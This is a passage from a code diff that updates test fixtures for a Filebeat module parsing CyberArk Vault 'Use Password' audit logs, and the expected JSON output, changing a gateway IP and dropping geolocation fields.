11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:49</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>FOR FUN.</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:27</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>For fun and profit</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:54:49</Timestamp>\n    <IsoTimestamp>2021-03-11T17:54:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>Because I say so</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:30</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>for fun</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:17</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>testing</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.2.69.143","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:31:54</Timestamp>\n    <IsoTimestamp>2021-03-15T10:31:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.2.69.143","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:26</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.2.69.143","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 03:04:49</Timestamp>\n    <IsoTimestamp>2021-03-16T10:04:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.2.69.143","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log-expected.json
index 5dfac39be327..609b7c410eea 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log-expected.json
@@ -80,11 +80,11 @@
         "cyberarkpas.audit.ca_properties.user_name": "adrian",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:12Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:12</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:12Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>fun and profit</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:12</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:12Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>fun and profit</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.reason": "fun and profit",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
@@ -92,11 +92,6 @@
         "cyberarkpas.audit.station": "127.0.0.1",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:12",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
